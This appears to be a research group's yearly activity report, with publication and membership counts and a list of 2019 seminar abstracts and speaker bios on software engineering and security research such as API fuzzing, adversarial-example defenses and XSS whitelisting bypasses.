New Publications | Number |
---|---|
Monographs and Edited Volumes | 0 |
PhD Theses | 1 |
Journal Articles | 7 |
Book Chapters | 0 |
Conference Publications | 12 |
Technical Reports | 0 |
White Papers | 0 |
Magazine Articles | 0 |
Working Papers | 0 |
Datasets | 5 |
Total New Publications | 25 |
Projects | |
New Projects | 1 |
Ongoing Projects | 1 |
Completed Projects | 1 |
Members | |
Faculty Members | 4 |
Senior Researchers | 4 |
Associate Researchers | 7 |
Researchers | 10 |
Total Members | 25 |
New Members | 4 |
PhDs | |
Ongoing PhDs | 6 |
Completed PhDs | 1 |
New Seminars | |
New Seminars | 11 |
Date: 05 April 2019
Presenter: Vasiliki Efstathiou
Abstract
The emergence of online open source repositories in the recent years has led to an explosion in the volume of openly available source code, coupled with metadata that relate to a variety of software development activities. As an effect, in line with recent advances in machine learning research, software maintenance activities are switching from symbolic formal methods to data–driven methods. In this context, the rich semantics hidden in source code identifiers provide opportunities for building semantic representations of code which can assist tasks of code search and reuse. To this end, we deliver in the form of pretrained vector space models, distributed code representations for six popular programming languages, namely, Java, Python, PHP, C, C++, and C#. The models are produced using fastText, a state–of–the–art library for learning word representations. Each model is trained on data from a single programming language; the code mined for producing all models amounts to over 13.000 repositories. We indicate dissimilarities between natural language and source code, as well as variations in coding conventions in between the different programming languages we processed. We describe how these heterogeneities guided the data preprocessing decisions we took and the selection of the training parameters in the released models. Finally, we propose potential applications of the models and discuss limitations of the models.
Date: 05 April 2019
Presenter: Zoe Kotti
Abstract
Introduction: The establishment of the Mining Software Repositories (MSR) Data Showcase conference track has encouraged researchers to provide more data sets as a basis for further empirical studies. Objectives: Examine the usage of the data papers published in the MSR proceedings in terms of use frequency, users, and use purpose. Methods: Data track papers were collected from the MSR Data Showcase and through the manual inspection of older MSR proceedings. The use of data papers was established through citation searching followed by reading the studies that have cited them. Data papers were then clustered based on their content, whereas their citations were classified according to the knowledge areas of the Guide to the Software Engineering Body of Knowledge. Results: We found that 65% of the data papers have been used in other studies, with a long-tail distribution in the number of citations. MSR data papers are cited less than other MSR papers. A considerable number of the citations stem from the teams that authored the data papers. Publications providing repository data and metadata are the most frequent data papers and the most often cited ones. Mobile application data papers are the least common ones, but the second most frequently cited. Conclusion: Data papers have provided the foundation for a significant number of studies, but there is room for improvement in their utilization. This can be done by setting a higher bar for their publication, by encouraging their use, and by providing incentives for the enrichment of existing data collections.
Date: 19 April 2019
Presenter: Vaggelis Atlidakis
Abstract
Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best effort and have been shown to be vulnerable to sophisticated attacks. Recently a set of certified defenses have been introduced, which provide guarantees of robustness to norm-bounded attacks, but they either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google’s Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically-inspired formalism, that provides a rigorous, generic, and flexible foundation for defense.
Date: 15 May 2019
Presenter: Vaggelis Giannikas
Abstract
Air transportation systems are exposed to daily disruptions, which have significant impact on operations causing not only monetary loss, but also customer dissatisfaction. Airlines operate tight schedules to maximise resource utilisation. However, the lack of sufficient buffers often result in the domino effect, where a delay of a single flight can delay many other dependent flights. Due to the complexity of air transportation systems the task of identifying the cause of a delay is not trivial. In this paper, we propose a framework for automatic detection of root-causes of delays and their propagation effects using airline historical data. The framework is composed of the following: 1) delay propagation model to create connection network, 2) delay network algorithm to find delay networks, and 3) community detection algorithm to identify root-causes and impact of disruptions. We test our framework on historical data of an airline, and show that the airline under study is prone to delay propagation through passenger connections. Additionally, majority of their delays are related to airport capacity, resource allocation, and passengers, and mainly originate from the hub.
Dr Vaggelis Giannikas is an Associate Professor at the School of Management, University of Bath where he also directs the engineering management teaching portfolio. He is studying the development and evaluation of intelligent logistics systems with applications in manufacturing, warehousing, inventory management and airline networks. A significant part of Vaggelis's research has been conducted in collaboration with corporations in Europe, USA and China. Prior to joining the University of Bath, Vaggelis served as a research associate at the Institute for Manufacturing, University of Cambridge where he was also the associate director of the Cambridge Auto-ID lab. He holds a PhD in Operations Management and Technology from the University of Cambridge and a BSc in Management Science and Technology from the Athens University of Economics and Business.
Date: 20 May 2019
Presenter: Vaggelis Atlidakis
Abstract
We introduce RESTler, the first stateful REST API fuzzer. RESTler analyzes the API specification of a cloud service and generates sequences of requests that automatically test the service through its API. RESTler generates test sequences by (1) inferring producer-consumer dependencies among request types declared in the specification (e.g., inferring that “a request B should be executed after request A” because B takes as an input a resource-id x produced by A) and by (2) analyzing dynamic feedback from responses observed during prior test executions in order to generate new tests (e.g., learning that “a request C after a request sequence A;B is refused by the service” and therefore avoiding this combination in the future).
We present experimental results showing that these two techniques are necessary to thoroughly exercise a service under test while pruning the large search space of possible request sequences. We used RESTler to test GitLab, a large open-source self-hosted Git service, as well as several Microsoft Azure and Office365 cloud services. RESTler found 28 bugs in Gitlab and several bugs in each of the Azure and Office365 cloud services tested so far. These bugs have been confirmed and fixed by the service owners.
Date: 20 June 2019
Presenter: Charalambos Mitropoulos
Abstract
The evolution of software bugs has been a well-studied topic in software engineering. We used three different program analysis tools to examine the different versions of two popular sets of programming tools (GNU Binary and Core utilities), and check if their bugs increase of decrease over time. Each tool is based on a different approach, namely: static analysis, symbolic execution, and fuzzing. In this way we can observe potential differences on the kinds of bugs that each tool detects and examine their effectiveness. To do so, we have performed a qualitative analysis on the results. Overall, our results indicate that we cannot say if bugs either decrease or increase over time and that the tools identify different bug types based on the method they follow.
Date: 25 June 2019
Presenter: Marios Fokaefs
Abstract
Digitization has undoubtedly transformed most markets, including traditional products and tangible commodities to services. In the centre of this transformation lies the software, which is the enabler and the connector behind the adoption of new technologies and the disruption of traditional processes. However, we cannot claim that we understand how software generates value and how we can quantify this value. The first goal of this research is to study the use of software both as a product and as tool, to identify its impact on generating value and revenue, and eventually to formalize this impact in models and processes that will guide the development and the evolution of the software systems according to these goals. Evolution is another challenge in the digital era for both software and services alike. Thanks to technological advancements like the Internet and smart devices, an increasing portion of the population as well as a great number of enterprises have become interconnected with immediate access to vast amounts of information. Besides the great number of connections and the high speed of data production and consumption, this situation is also characterized by its greatly dynamic nature and high volatility. Under these circumstances, software needs to be adjustable, in order to constantly generate value for the company and its clients. From a technical perspective, recent advancements in Software Engineering, like DevOps and self-adaptive systems, have contributed towards adapting software to such dynamic conditions. However, profitability and continuous value generation are not always immediately considered in this setting neither as goals nor as constraints. The economic impact of a software change or the need to also adapt business and economic strategies are assessed after the change and possibly long after it is relevant. For example, consider the extension of a mobile banking app to enable remote bill payments. Is there a way to predict the economic benefits of this feature before it is developed? How accurate will this prediction be? How fast can we roll out the new version including the business planning? Therefore, the second goal of this research is to align the technical and economic goals of software change.
Presenter: I am an Assistant Professor in the Department of Computer and Software Engineering at Polytechnique Montréal. Previously, I was a Postdoctoral Fellow with the Centre of Excellence for Research in Adaptive Systems at York University, Canada, since February 2015 working with Professor Marin Litoiu. I received my Master's and PhD in Software Engineering in January 2015, from the Department of Computing Science at the University of Alberta, Canada under the supervision of Professor Eleni Stroulia. I also hold a BSc since 2008 from the Department of Applied Informatics at the University of Macedonia, Thessaloniki, Greece under the supervision of Professor Alexander Chatzigeorgiou.
Date: 05 July 2019
Presenter: Stefanos Georgiou
Abstract
Continuous integration and deployment are part of the daily process in an industrial environment to boost productivity, reduce bugs, and automate processes. However, if not utilized correctly, it can cost a significant amount of time to test and integrate code changes. In this presentation, we show the effort demanded before and after employing CI/CD practices. Additionally, we show the shortcomings of our first CI/CD pipeline and explain how we optimized it. Moreover, we demonstrate how we improved our development process by incorporating cutting-edge technologies and practices such as Bitrise, Cypress, Docker containers, and Google's Cloud Platform services.
Date: 24 July 2019
Presenter: Maria Kechagia (joint work with Xavier Devroey, Annibale Panichella, Georgios Gousios, Arie van Deursen)
Abstract
Application Programming Interfaces (APIs) typically come with (implicit) usage constraints. The violations of these constraints (API misuses) can lead to software crashes. Even though there are several tools that can detect API misuses, most of them suffer from a very high rate of false positives. We introduce Catcher, a novel API-misuse detection approach that combines static exception propagation analysis with automatic search-based test case generation to effectively and efficiently pinpoint crash-prone API misuses in client applications. We validate Catcher against 21 Java applications, targeting misuses of the Java platform’s API. Our results indicatethat Catcher is able to generate test cases that uncover 243 (unique) API misuses that result in crashes. Our empirical evaluation shows that Catcher can detect a large number of misuses (77 cases) that would remain undetected by the traditional coverage-based test case generator EvoSuite. Additionally, Catcher is on average eight times faster than EvoSuite in generating test cases for the identified misuses. Finally, we find that the majority of the exceptions triggered by Catcher are unexpected to developers i.e., not only unhandled in the source code but also not listed in the documentation of the client applications.
Dr. Maria Kechagia is a research fellow at CREST, UCL. Previously, she was a postdoctoral fellow at the Delft University of Technology and a member of the Software Engineering Research Group. She finished her Ph.D. in Software Engineering in the Department of Management Science and Technology, at the Athens University of Economics and Business, under the supervision of Prof. Diomidis Spinellis. Before that, she pursued her MSc in Computing (Software Engineering) at Imperial College London and her BSc in Management Science and Technology at the Athens University of Economics and Business. Her research interests lie in the areas of software engineering, software verification, crash data analytics, and programming languages. In particular, her current research focuses on combining static analysis and software testing to effectively and efficiently repair API-related bugs in software programs. Her research work has been published in leading peer-reviewed software engineering conferences and journals including ICSE, ISSTA, MSR, EMSE, and JSS.
Date: 13 September 2019
Presenter: Stefanos Chaliasos
Abstract
Despite numerous efforts to mitigate Cross-Site Scripting (XSS) attacks, XSS remains one of the most prevalent threats to modern web applications. Recently, a number of novel XSS patterns, based on code-reuse and obfuscated payloads, were introduced to bypass different protection mechanisms such as sanitization frameworks, web application firewalls, and the Content Security Policy (CSP). Nevertheless, a class of script-whitelisting defenses that perform their checks inside the JavaScript engine of the browser, remains effective against these new patterns. We have evaluated the effectiveness of whitelisting mechanisms for the web by introducing “JavaScript mimicry attacks”. The concept behind such attacks is to use slight transformations (i.e. changing the leaf values of the abstract syntax tree) of an application’s benign scripts as attack vectors, for malicious purposes. Our proof-of-concept exploitations indicate that JavaScript mimicry can bypass script-whitelisting mechanisms affecting either users (e.g. cookie stealing) or applications (e.g. cryptocurrency miner hijacking). Furthermore, we have examined the applicability of such attacks at scale by performing two studies: one based on popular application frameworks (e.g. WordPress) and the other focusing on scripts coming from Alexa’s top 20 websites. Finally, we have developed an automated method to help researchers and practitioners discover mimicry scripts in the wild. To do so, our method employs symbolic analysis based on a lightweight weakest precondition calculation.
Date: 19 September 2019
Presenter: Christos Tsigkanos
Abstract
Computing and communication capabilities are increasingly being embedded into physical spaces blurring the boundary between computational and physical worlds; typically, this is the case in modern cyber-physical or internet-of-things (IoT) systems. Conceptually, such composite environments can be abstracted into a topological model where computational and physical entities are connected in a graph structure, yielding a cyber-physical space. Like any other software-intensive system, such a space is highly dynamic and typically undergoes continuous change - it is evolving. This brings a manifold of challenges as dynamics may affect e.g. safety, security, or reliability requirements. Modelling space and its dynamics as well as supporting formal reasoning about various properties of an evolving space, are crucial prerequisites for engineering dependable space-intensive systems, e.g. to assure requirements satisfaction or to trigger correct adaptation.
This talk will show an avenue for research which can be characterized as rethinking spatial environments from a software engineering perspective -- in both design and operation aspects. Regarding design, we will see how domain descriptions can give rise to models amenable to automated analyses of dynamic behaviours on spaces populated with humans, robots, or mobile devices. Analysis amounts to assessing if some collective behaviour that is highly space-dependent, violates certain requirements that the overall system should exhibit. Regarding runtime, we will consider supporting analyses on the cloud on behalf of resource-constrained and spatially-distributed IoT devices. We will discuss how spatial verification processes can be integrated in the service layer of an IoT-cloud architecture based on microservices, and what tradeoffs emerge across different deployment options.
Christos Tsigkanos is university assistant at the Technical University of Vienna. Previously, he was post-doctoral researcher at Politecnico di Milano, Italy where he received (2017) his PhD defending a thesis entitled ”Modelling and Verification of Evolving Cyber-Physical Spaces” (advisor prof. Carlo Ghezzi). His research interests lie in the intersection of dependable systems and formal aspects of software engineering, and include security and privacy in distributed, self-adaptive and cyber-physical systems, requirements engineering and formal verification.